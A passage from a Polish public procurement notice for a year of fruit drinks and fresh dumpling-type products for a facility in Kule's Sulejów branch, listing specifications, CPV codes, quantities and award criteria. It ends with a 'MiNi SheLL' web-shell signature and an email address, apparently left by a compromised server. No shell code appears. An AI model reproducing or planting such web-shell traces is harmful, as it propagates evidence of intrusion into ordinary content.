5	Napoje owocowe 	15982000-5	Napój owocowy: jabłkowy, pomarańczowy, grejpfrutowy, z czarnej porzeczki, produkowany z soku owoców lub zagęszczonego soku owocowego zawierający naturalne składniki smakowo-aromatyczne, niegazowany, zdolny do fermentacji, lecz niesfermentowany, otrzymany przez dodanie wody i cukru lub substancji słodzących. Konsystencja płynna, zawartość ekstraktu nie mniej niż 10%. Barwa charakterystyczna dla użytych składników, klarowna, bez osadów i innych zanieczyszczeń. Smak i zapach charakterystyczny dla owoców. Opakowanie jednostkowe: kartoniki wielowarstwowe, powlekane, termozgrzewalne typu TETRA PAK, posiadające atest PZH o dopuszczeniu do kontaktu z żywnością. Pojemność 1 litr. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	litr	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 15.98.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy produktów mącznych dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Pierogi	15851000- 8	z ciasta pierogowego, z farszem mięsnym, warzywno-mięsnym, serowym, owocowym lub z grzybami; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od chwili wyprodukowania; waga ok. 400 g (8 szt.). Produkt świeży, nie mrożony.	kg	500
2	Kopytka - kluski ziemniaczane	15851000- 8	składniki: ziemniaki, mąka pszenna, mąka ziemniaczana, jaja, sól; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 500 g (20 szt.). Produkt świeży, nie mrożony.	kg	100
3	Krokiety	15851000- 8	z ciasta naleśnikowego z farszem :pieczarka z kapustą lub z mięsem; opakowanie jednostkowe: tacka styropianowa + folia spożywcza.; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 500 g (4  szt.). Produkt świeży, nie mrożony .	kg	300
4	Naleśniki	15851000- 8	ciasto naleśnikowe z farszem z sera lub z owoców; opakowanie jednostkowe: tacka styropianowa + folia spożywcza.; okres przydatności do spożycia: 72 godziny od daty dostawy ; waga ok. 500 g (4 szt.). Produkt świeży, nie mrożony. 	kg	500
5	Kluski śląskie	15851000- 8	składniki: ziemniaki, mąka ziemniaczana, mąka pszenna, jaja, sól; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 500 g (20 szt.). Produkt świeży, nie mrożony. 	kg	100
6	Kartacze 	15851000- 8	składniki: ziemniaki surowe, gotowane, mąka pszenna, mąka ziemniaczana, jaja, sól; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 600 g (5 szt.). Produkt świeży, nie mrożony.	kg	300
7	Kartacze z mięsem	15851000- 8	składniki: ziemniaki surowe, gotowane, mąka pszenna, mąka ziemniaczana, jaja, farsz mięsny, sól; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 600 g (5 szt.). Produkt świeży, nie mrożony.	kg	300
8	Pyzy z mięsem	15851000- 8	składniki: ziemniaki, mąka ziemniaczana, mąka pszenna, jaja, sól; farsz mięsny, opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 500 g (20 szt.). Produkt świeży, nie mrożony. 	kg	300
9	Knedle	15851000- 8	składniki: ziemniaki, mąka ziemniaczana, mąka pszenna, jaja, sól; farsz: truskawki, śliwki; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 500 g (10 szt.). Produkt świeży, nie mrożony 	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com